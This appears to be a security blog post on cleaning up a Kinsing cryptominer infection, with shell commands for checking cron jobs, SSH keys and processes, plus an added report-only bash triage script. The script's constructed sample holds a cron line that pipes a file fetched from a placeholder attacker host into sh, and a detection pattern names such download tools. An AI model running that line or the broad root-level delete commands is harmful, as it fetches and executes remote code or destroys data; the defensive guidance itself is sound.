The so-called “solution” for a Kinsing infection is not creating a cron job that purges suspicious files but conducting a thorough root-cause analysis to identify persistence mechanisms and clean up properly. A proper forensic analysis after a breach is essential—otherwise, malicious code may reappear, and temporary fixes won’t resolve the issue.
[1] Kinsing Infection Analysis
You Should Know: Kinsing Malware Removal & Forensic Steps
1. Identify Persistence Mechanisms
Kinsing malware often uses multiple persistence techniques, such as:
– Cron Jobs: Check for malicious scheduled tasks.
```bash
crontab -l                          # current user's cron jobs (run as root, or add -u root, to see root's)
ls -la /etc/cron.* /etc/crontab     # system-wide cron directories and the system crontab
ls -la /var/spool/cron*             # per-user crontab spool (path varies by distribution)
```
– Hidden Processes: Look for unusual processes.
```bash
ps aux | grep -i kinsing
top -b -n 1 | grep -iE "miner|crypto"   # -E is required for the | alternation to work
```
– SSH Backdoors: Verify authorized keys.
```bash
cat ~/.ssh/authorized_keys     # every key here can log in as this user; remove any you cannot account for
ls -la /root/.ssh/
```
2. Remove Malicious Files & Binaries
Locate and delete Kinsing-related files (preserve a copy for analysis first if you still need the root cause):
```bash
find / -name "kinsing" -exec rm -rf {} \; 2>/dev/null   # main payload
find / -name "libsystem.so" -delete                        # shared object dropped alongside it
```
3. Kill Malicious Processes
Terminate active Kinsing processes:
```bash
pkill -f kinsing
pkill -f kdevtmpfsi   # the miner process Kinsing launches
```
4. Check Network Connections
Identify suspicious outbound connections:
```bash
netstat -tulnp | grep -E "(kinsing|miner)"   # listening sockets owned by suspicious processes
ss -tunap | grep ESTAB                        # established connections with owning PIDs (-l alone lists only listeners)
```
5. Patch Exploited Services
Kinsing often exploits vulnerabilities in:
- Docker (misconfigured APIs)
- Redis (unauthenticated access)
- Web applications (RCE flaws)
Secure them:
Redis (require authentication, then restart):
```bash
echo "requirepass YourStrongPassword" >> /etc/redis/redis.conf
systemctl restart redis
```
Docker (remove any container you did not create):
```bash
docker ps -a | grep suspicious_container && docker rm -f suspicious_container
```
6. Monitor & Harden the System
- Install & Configure Fail2Ban:
```bash
apt install fail2ban -y
systemctl enable --now fail2ban
```
- Check Kernel Modules for Rootkits:
```bash
lsmod | grep -iE "backdoor|malicious"   # naive name check; also diff lsmod against a known-good baseline, since rootkit modules rarely use telling names
```
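The checks in step 1 are easier to repeat, and to run against artefacts copied off a compromised host, as small text-only functions. This is an added example, not code from the original post: it flags cron entries that fetch-and-execute or run from world-writable paths, and lists SSH keys missing from an approved baseline, without deleting anything, so evidence survives for the root-cause analysis. The sample crontab, keys and the `attacker.invalid` host are constructed.

```bash
#!/usr/bin/env bash
# Added example: report-only triage helpers for the persistence checks above.
# Feed them copied artefacts (crontab -l output, authorized_keys) on stdin.

# Print cron entries that download-and-execute, decode payloads, or run from
# world-writable paths. Exit status 0 if anything matched, 1 if clean.
flag_cron_entries() {
  grep -vE '^[[:space:]]*(#|$)' \
    | grep -E 'curl|wget|base64 +-d|/tmp/|/dev/shm/|\|[[:space:]]*(ba)?sh([[:space:]]|$)'
}

# Print authorized_keys entries whose key material is absent from the baseline
# file of approved keys given as $1. Exit status 0 if unknown keys exist, 1 if none.
unknown_ssh_keys() {
  local baseline="$1" found=1 type key comment
  while read -r type key comment; do
    case "$type" in ''|'#'*) continue ;; esac   # skip blank lines and comments
    if ! grep -qF -- "$key" "$baseline"; then
      printf '%s %s %s\n' "$type" "$key" "$comment"
      found=0
    fi
  done
  return "$found"
}

# Constructed samples (not real captures) in the shape Kinsing leaves behind:
# a legitimate entry next to a fetch-and-pipe-to-sh cron job, and an admin key
# next to one nobody on the team recognises.
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
* * * * * wget -q -O - http://attacker.invalid/placeholder.sh | sh > /dev/null 2>&1'
SAMPLE_KEYS='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEADMINKEY000000000000000000000000000 admin@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCFAKEUNKNOWNKEY000000000000000000000000 unknown'

# Stand-alone run: show the flagged cron line from the constructed sample.
printf '%s\n' "$SAMPLE_CRON" | flag_cron_entries || echo "no suspicious cron entries"
```

On a live host, replace the samples with `crontab -l` output and the real `authorized_keys`, and keep the baseline file on a separate, trusted machine.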
What Undercode Say
Kinsing is a persistent threat that requires more than superficial cleanup. A proper forensic approach involves:
– Log Analysis: Check /var/log/auth.log, /var/log/syslog.
– File Integrity Monitoring: Use `aide` or `tripwire`.
– User Account Audits:
```bash
awk -F: '($3 == 0) {print}' /etc/passwd   # list root-equivalent users (UID 0); only root should appear
```
– Memory Forensics: Use `Volatility` if needed.
– Network Isolation: Block malicious IPs via iptables:
```bash
iptables -A INPUT -s 1.2.3.4 -j DROP   # 1.2.3.4 is a placeholder; block outbound traffic to the same address too if it is a C2 or mining pool
```
Always assume persistence—verify, remediate, and monitor continuously.
Expected Output:
A fully remediated system with no traces of Kinsing, secured against reinfection.
References:
Reported By: Stephan Berger – Hackers Feeds